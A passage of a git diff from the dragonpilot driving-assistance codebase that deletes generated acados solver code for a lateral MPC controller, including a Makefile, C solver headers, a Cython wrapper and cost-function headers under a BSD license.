IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE -# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE.; -# - - - - - -# define sources and use make's implicit rules to generate object files (*.o) - -# model -MODEL_SRC= -MODEL_SRC+= lat_model/lat_expl_ode_fun.c -MODEL_SRC+= lat_model/lat_expl_vde_forw.c -MODEL_OBJ := $(MODEL_SRC:.c=.o) - -# optimal control problem - mostly CasADi exports -OCP_SRC= -OCP_SRC+= lat_cost/lat_cost_y_0_fun.c -OCP_SRC+= lat_cost/lat_cost_y_0_fun_jac_ut_xt.c -OCP_SRC+= lat_cost/lat_cost_y_0_hess.c -OCP_SRC+= lat_cost/lat_cost_y_fun.c -OCP_SRC+= lat_cost/lat_cost_y_fun_jac_ut_xt.c -OCP_SRC+= lat_cost/lat_cost_y_hess.c -OCP_SRC+= lat_cost/lat_cost_y_e_fun.c -OCP_SRC+= lat_cost/lat_cost_y_e_fun_jac_ut_xt.c -OCP_SRC+= lat_cost/lat_cost_y_e_hess.c -OCP_SRC+= acados_solver_lat.c -OCP_OBJ := $(OCP_SRC:.c=.o) - -# for sim solver -SIM_SRC= acados_sim_solver_lat.c -SIM_OBJ := $(SIM_SRC:.c=.o) - -# for target example -EX_SRC= main_lat.c -EX_OBJ := $(EX_SRC:.c=.o) -EX_EXE := $(EX_SRC:.c=) - -# for target example_sim -EX_SIM_SRC= main_sim_lat.c -EX_SIM_OBJ := $(EX_SIM_SRC:.c=.o) -EX_SIM_EXE := $(EX_SIM_SRC:.c=) - -# combine model, sim and ocp object files -OBJ= -OBJ+= $(MODEL_OBJ) -OBJ+= $(SIM_OBJ) -OBJ+= $(OCP_OBJ) - -EXTERNAL_DIR= -EXTERNAL_LIB= - -INCLUDE_PATH = /data/openpilot/third_party/acados/include -LIB_PATH = /data/openpilot/third_party/acados/lib - -# preprocessor flags for make's implicit rules -CPPFLAGS+= -I$(INCLUDE_PATH) -CPPFLAGS+= -I$(INCLUDE_PATH)/acados -CPPFLAGS+= -I$(INCLUDE_PATH)/blasfeo/include -CPPFLAGS+= -I$(INCLUDE_PATH)/hpipm/include - - -# define the c-compiler flags for make's implicit rules -CFLAGS = -fPIC -std=c99 #-fno-diagnostics-show-line-numbers -g -# # Debugging -# CFLAGS += -g3 - -# linker flags -LDFLAGS+= -L$(LIB_PATH) - -# link to libraries -LDLIBS+= -lacados -LDLIBS+= -lhpipm -LDLIBS+= -lblasfeo -LDLIBS+= -lm -LDLIBS+= - -# libraries -LIBACADOS_SOLVER=libacados_solver_lat.so -LIBACADOS_OCP_SOLVER=libacados_ocp_solver_lat.so -LIBACADOS_SIM_SOLVER=lib$(SIM_SRC:.c=.so) - -# virtual targets -.PHONY : all clean - -#all: clean example_sim example shared_lib - -all: clean example_sim example -shared_lib: bundled_shared_lib ocp_shared_lib sim_shared_lib - -# some linker targets -example: $(EX_OBJ) $(OBJ) - $(CC) $^ -o $(EX_EXE) $(LDFLAGS) $(LDLIBS) - -example_sim: $(EX_SIM_OBJ) $(MODEL_OBJ) $(SIM_OBJ) - $(CC) $^ -o $(EX_SIM_EXE) $(LDFLAGS) $(LDLIBS) - -bundled_shared_lib: $(OBJ) - $(CC) -shared $^ -o $(LIBACADOS_SOLVER) $(LDFLAGS) $(LDLIBS) - -ocp_shared_lib: $(OCP_OBJ) $(MODEL_OBJ) - $(CC) -shared $^ -o $(LIBACADOS_OCP_SOLVER) $(LDFLAGS) $(LDLIBS) \ - -L$(EXTERNAL_DIR) -l$(EXTERNAL_LIB) - -sim_shared_lib: $(SIM_OBJ) $(MODEL_OBJ) - $(CC) -shared $^ -o $(LIBACADOS_SIM_SOLVER) $(LDFLAGS) $(LDLIBS) - - -# Cython targets -ocp_cython_c: ocp_shared_lib - cython \ - -o acados_ocp_solver_pyx.c \ - -I $(INCLUDE_PATH)/../interfaces/acados_template/acados_template \ - $(INCLUDE_PATH)/../interfaces/acados_template/acados_template/acados_ocp_solver_pyx.pyx \ - -I /data/openpilot/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code \ - -ocp_cython_o: ocp_cython_c - $(CC) $(ACADOS_FLAGS) -c -O2 \ - -fPIC \ - -o acados_ocp_solver_pyx.o \ - -I /usr/include/python3.8 \ - -I $(INCLUDE_PATH)/blasfeo/include/ \ - -I $(INCLUDE_PATH)/hpipm/include/ \ - -I $(INCLUDE_PATH) \ - -I /usr/local/pyenv/versions/3.8.10/lib/python3.8/site-packages/numpy/core/include \ - acados_ocp_solver_pyx.c \ - -ocp_cython: ocp_cython_o - $(CC) $(ACADOS_FLAGS) -shared \ - -o acados_ocp_solver_pyx.so \ - -Wl,-rpath=$(LIB_PATH) \ - acados_ocp_solver_pyx.o \ - $(abspath .)/libacados_ocp_solver_lat.so \ - $(LDFLAGS) $(LDLIBS) - -clean: - $(RM) $(OBJ) $(EX_OBJ) $(EX_SIM_OBJ) - $(RM) $(LIBACADOS_SOLVER) $(LIBACADOS_OCP_SOLVER) $(LIBACADOS_SIM_SOLVER) - $(RM) $(EX_EXE) $(EX_SIM_EXE) - -clean_ocp_shared_lib: - $(RM) $(LIBACADOS_OCP_SOLVER) - $(RM) $(OCP_OBJ) - -clean_ocp_cython: - $(RM) libacados_ocp_solver_lat.so - $(RM) acados_solver_lat.o - $(RM) acados_ocp_solver_pyx.so - $(RM) acados_ocp_solver_pyx.o diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so deleted file mode 100755 index e25f18864..000000000 Binary files a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so and /dev/null differ diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_sim_solver_lat.h b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_sim_solver_lat.h deleted file mode 100644 index 86b9c84c9..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_sim_solver_lat.h +++ /dev/null @@ -1,103 +0,0 @@ -/* - * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, - * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, - * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, - * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl - * - * This file is part of acados. - * - * The 2-Clause BSD License - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - * POSSIBILITY OF SUCH DAMAGE.; - */ - -#ifndef ACADOS_SIM_lat_H_ -#define ACADOS_SIM_lat_H_ - -#include "acados_c/sim_interface.h" -#include "acados_c/external_function_interface.h" - -#define LAT_NX 4 -#define LAT_NZ 0 -#define LAT_NU 1 -#define LAT_NP 2 - -#ifdef __cplusplus -extern "C" { -#endif - - -// ** capsule for solver data ** -typedef struct sim_solver_capsule -{ - // acados objects - sim_in *acados_sim_in; - sim_out *acados_sim_out; - sim_solver *acados_sim_solver; - sim_opts *acados_sim_opts; - sim_config *acados_sim_config; - void *acados_sim_dims; - - /* external functions */ - // ERK - external_function_param_casadi * sim_forw_vde_casadi; - external_function_param_casadi * sim_expl_ode_fun_casadi; - external_function_param_casadi * sim_expl_ode_hess; - - // IRK - external_function_param_casadi * sim_impl_dae_fun; - external_function_param_casadi * sim_impl_dae_fun_jac_x_xdot_z; - external_function_param_casadi * sim_impl_dae_jac_x_xdot_u_z; - external_function_param_casadi * sim_impl_dae_hess; - - // GNSF - external_function_param_casadi * sim_gnsf_phi_fun; - external_function_param_casadi * sim_gnsf_phi_fun_jac_y; - external_function_param_casadi * sim_gnsf_phi_jac_y_uhat; - external_function_param_casadi * sim_gnsf_f_lo_jac_x1_x1dot_u_z; - external_function_param_casadi * sim_gnsf_get_matrices_fun; - -} sim_solver_capsule; - - -ACADOS_SYMBOL_EXPORT int lat_acados_sim_create(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT int lat_acados_sim_solve(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT int lat_acados_sim_free(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT int lat_acados_sim_update_params(sim_solver_capsule *capsule, double *value, int np); - -ACADOS_SYMBOL_EXPORT sim_config * lat_acados_get_sim_config(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT sim_in * lat_acados_get_sim_in(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT sim_out * lat_acados_get_sim_out(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT void * lat_acados_get_sim_dims(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT sim_opts * lat_acados_get_sim_opts(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT sim_solver * lat_acados_get_sim_solver(sim_solver_capsule *capsule); - - -ACADOS_SYMBOL_EXPORT sim_solver_capsule * lat_acados_sim_solver_create_capsule(void); -ACADOS_SYMBOL_EXPORT int lat_acados_sim_solver_free_capsule(sim_solver_capsule *capsule); - -#ifdef __cplusplus -} -#endif - -#endif // ACADOS_SIM_lat_H_ diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_solver.pxd b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_solver.pxd deleted file mode 100644 index 8397f8e9d..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_solver.pxd +++ /dev/null @@ -1,62 +0,0 @@ -# -# Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, -# Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, -# Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, -# Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl -# -# This file is part of acados. -# -# The 2-Clause BSD License -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# -# 1. Redistributions of source code must retain the above copyright notice, -# this list of conditions and the following disclaimer. -# -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE -# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE.; -# - -cimport acados_solver_common - -cdef extern from "acados_solver_lat.h": - ctypedef struct nlp_solver_capsule "lat_solver_capsule": - pass - - nlp_solver_capsule * acados_create_capsule "lat_acados_create_capsule"() - int acados_free_capsule "lat_acados_free_capsule"(nlp_solver_capsule *capsule) - - int acados_create "lat_acados_create"(nlp_solver_capsule * capsule) - - int acados_create_with_discretization "lat_acados_create_with_discretization"(nlp_solver_capsule * capsule, int n_time_steps, double* new_time_steps) - int acados_update_time_steps "lat_acados_update_time_steps"(nlp_solver_capsule * capsule, int N, double* new_time_steps) - int acados_update_qp_solver_cond_N "lat_acados_update_qp_solver_cond_N"(nlp_solver_capsule * capsule, int qp_solver_cond_N) - - int acados_update_params "lat_acados_update_params"(nlp_solver_capsule * capsule, int stage, double *value, int np_) - int acados_solve "lat_acados_solve"(nlp_solver_capsule * capsule) - int acados_reset "lat_acados_reset"(nlp_solver_capsule * capsule) - int acados_free "lat_acados_free"(nlp_solver_capsule * capsule) - void acados_print_stats "lat_acados_print_stats"(nlp_solver_capsule * capsule) - - acados_solver_common.ocp_nlp_in *acados_get_nlp_in "lat_acados_get_nlp_in"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_out *acados_get_nlp_out "lat_acados_get_nlp_out"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_out *acados_get_sens_out "lat_acados_get_sens_out"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_solver *acados_get_nlp_solver "lat_acados_get_nlp_solver"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_config *acados_get_nlp_config "lat_acados_get_nlp_config"(nlp_solver_capsule * capsule) - void *acados_get_nlp_opts "lat_acados_get_nlp_opts"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_dims *acados_get_nlp_dims "lat_acados_get_nlp_dims"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_plan *acados_get_nlp_plan "lat_acados_get_nlp_plan"(nlp_solver_capsule * capsule) diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_solver_lat.h b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_solver_lat.h deleted file mode 100644 index 824df5467..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/acados_solver_lat.h +++ /dev/null @@ -1,167 +0,0 @@ -/* - * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, - * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, - * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, - * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl - * - * This file is part of acados. - * - * The 2-Clause BSD License - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - * POSSIBILITY OF SUCH DAMAGE.; - */ - -#ifndef ACADOS_SOLVER_lat_H_ -#define ACADOS_SOLVER_lat_H_ - -#include "acados/utils/types.h" - -#include "acados_c/ocp_nlp_interface.h" -#include "acados_c/external_function_interface.h" - -#define LAT_NX 4 -#define LAT_NZ 0 -#define LAT_NU 1 -#define LAT_NP 2 -#define LAT_NBX 2 -#define LAT_NBX0 4 -#define LAT_NBU 0 -#define LAT_NSBX 0 -#define LAT_NSBU 0 -#define LAT_NSH 0 -#define LAT_NSG 0 -#define LAT_NSPHI 0 -#define LAT_NSHN 0 -#define LAT_NSGN 0 -#define LAT_NSPHIN 0 -#define LAT_NSBXN 0 -#define LAT_NS 0 -#define LAT_NSN 0 -#define LAT_NG 0 -#define LAT_NBXN 0 -#define LAT_NGN 0 -#define LAT_NY0 3 -#define LAT_NY 3 -#define LAT_NYN 2 -#define LAT_N 16 -#define LAT_NH 0 -#define LAT_NPHI 0 -#define LAT_NHN 0 -#define LAT_NPHIN 0 -#define LAT_NR 0 - -#ifdef __cplusplus -extern "C" { -#endif - -// ** capsule for solver data ** -typedef struct lat_solver_capsule -{ - // acados objects - ocp_nlp_in *nlp_in; - ocp_nlp_out *nlp_out; - ocp_nlp_out *sens_out; - ocp_nlp_solver *nlp_solver; - void *nlp_opts; - ocp_nlp_plan_t *nlp_solver_plan; - ocp_nlp_config *nlp_config; - ocp_nlp_dims *nlp_dims; - - // number of expected runtime parameters - unsigned int nlp_np; - - /* external functions */ - // dynamics - - external_function_param_casadi *forw_vde_casadi; - external_function_param_casadi *expl_ode_fun; - - - - - // cost - - external_function_param_casadi *cost_y_fun; - external_function_param_casadi *cost_y_fun_jac_ut_xt; - external_function_param_casadi *cost_y_hess; - - - external_function_param_casadi cost_y_0_fun; - external_function_param_casadi cost_y_0_fun_jac_ut_xt; - external_function_param_casadi cost_y_0_hess; - - - - external_function_param_casadi cost_y_e_fun; - external_function_param_casadi cost_y_e_fun_jac_ut_xt; - external_function_param_casadi cost_y_e_hess; - - - // constraints - - - - -} lat_solver_capsule; - -ACADOS_SYMBOL_EXPORT lat_solver_capsule * lat_acados_create_capsule(void); -ACADOS_SYMBOL_EXPORT int lat_acados_free_capsule(lat_solver_capsule *capsule); - -ACADOS_SYMBOL_EXPORT int lat_acados_create(lat_solver_capsule * capsule); - -ACADOS_SYMBOL_EXPORT int lat_acados_reset(lat_solver_capsule* capsule); - -/** - * Generic version of lat_acados_create which allows to use a different number of shooting intervals than - * the number used for code generation. If new_time_steps=NULL and n_time_steps matches the number used for code - * generation, the time-steps from code generation is used. - */ -ACADOS_SYMBOL_EXPORT int lat_acados_create_with_discretization(lat_solver_capsule * capsule, int n_time_steps, double* new_time_steps); -/** - * Update the time step vector. Number N must be identical to the currently set number of shooting nodes in the - * nlp_solver_plan. Returns 0 if no error occurred and a otherwise a value other than 0. - */ -ACADOS_SYMBOL_EXPORT int lat_acados_update_time_steps(lat_solver_capsule * capsule, int N, double* new_time_steps); -/** - * This function is used for updating an already initialized solver with a different number of qp_cond_N. - */ -ACADOS_SYMBOL_EXPORT int lat_acados_update_qp_solver_cond_N(lat_solver_capsule * capsule, int qp_solver_cond_N); -ACADOS_SYMBOL_EXPORT int lat_acados_update_params(lat_solver_capsule * capsule, int stage, double *value, int np); -ACADOS_SYMBOL_EXPORT int lat_acados_solve(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT int lat_acados_free(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT void lat_acados_print_stats(lat_solver_capsule * capsule); - -ACADOS_SYMBOL_EXPORT ocp_nlp_in *lat_acados_get_nlp_in(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_out *lat_acados_get_nlp_out(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_out *lat_acados_get_sens_out(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_solver *lat_acados_get_nlp_solver(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_config *lat_acados_get_nlp_config(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT void *lat_acados_get_nlp_opts(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_dims *lat_acados_get_nlp_dims(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_plan_t *lat_acados_get_nlp_plan(lat_solver_capsule * capsule); - -#ifdef __cplusplus -} /* extern "C" */ -#endif - -#endif // ACADOS_SOLVER_lat_H_ diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun.h b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun.h deleted file mode 100644 index 842fc03df..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun.h +++ /dev/null @@ -1,69 +0,0 @@ -/* - * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, - * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, - * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, - * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl - * - * This file is part of acados. - * - * The 2-Clause BSD License - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - * POSSIBILITY OF SUCH DAMAGE.; - */ - - -#ifndef lat_Y_0_COST -#define lat_Y_0_COST - -#ifdef __cplusplus -extern "C" { -#endif - - -int lat_cost_y_0_fun(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_0_fun_work(int *, int *, int *, int *); -const int *lat_cost_y_0_fun_sparsity_in(int); -const int *lat_cost_y_0_fun_sparsity_out(int); -int lat_cost_y_0_fun_n_in(void); -int lat_cost_y_0_fun_n_out(void); - -int lat_cost_y_0_fun_jac_ut_xt(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_0_fun_jac_ut_xt_work(int *, int *, int *, int *); -const int *lat_cost_y_0_fun_jac_ut_xt_sparsity_in(int); -const int *lat_cost_y_0_fun_jac_ut_xt_sparsity_out(int); -int lat_cost_y_0_fun_jac_ut_xt_n_in(void); -int lat_cost_y_0_fun_jac_ut_xt_n_out(void); - -int lat_cost_y_0_hess(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_0_hess_work(int *, int *, int *, int *); -const int *lat_cost_y_0_hess_sparsity_in(int); -const int *lat_cost_y_0_hess_sparsity_out(int); -int lat_cost_y_0_hess_n_in(void); -int lat_cost_y_0_hess_n_out(void); - - -#ifdef __cplusplus -} /* extern "C" */ -#endif - -#endif // lat_Y_0_COST diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun.h b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun.h deleted file mode 100644 index 9e444b984..000000000 --- a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun.h +++ /dev/null @@ -1,69 +0,0 @@ -/* - * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, - * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, - * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, - * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl - * - * This file is part of acados. - * - * The 2-Clause BSD License - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - * POSSIBILITY OF SUCH DAMAGE.; - */ - - -#ifndef lat_Y_E_COST -#define lat_Y_E_COST - -#ifdef __cplusplus -extern "C" { -#endif - - -int lat_cost_y_e_fun(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_e_fun_work(int *, int *, int *, int *); -const int *lat_cost_y_e_fun_sparsity_in(int); -const int *lat_cost_y_e_fun_sparsity_out(int); -int lat_cost_y_e_fun_n_in(void); -int lat_cost_y_e_fun_n_out(void); - -int lat_cost_y_e_fun_jac_ut_xt(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_e_fun_jac_ut_xt_work(int *, int *, int *, int *); -const int *lat_cost_y_e_fun_jac_ut_xt_sparsity_in(int); -const int *lat_cost_y_e_fun_jac_ut_xt_sparsity_out(int); -int lat_cost_y_e_fun_jac_ut_xt_n_in(void); -int lat_cost_y_e_fun_jac_ut_xt_n_out(void); - -int lat_cost_y_e_hess(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_e_hess_work(int *, int *, int *, int *); -const int *lat_cost_y_e_hess_sparsity_in(int); -const int *lat_cost_y_e_hess_sparsity_out(int); -int lat_cost_y_e_hess_n_in(void); -int lat_cost_y_e_hess_n_out(void); - - -#ifdef __cplusplus -} /* extern "C" */ -#endif - -#endif // lat_Y_E_COST diff --git a/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_model.h b/selfdrive/dragonpilot/controls_0816/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_model.h deleted file mode 100644 index 98ed49214..000000000 --- 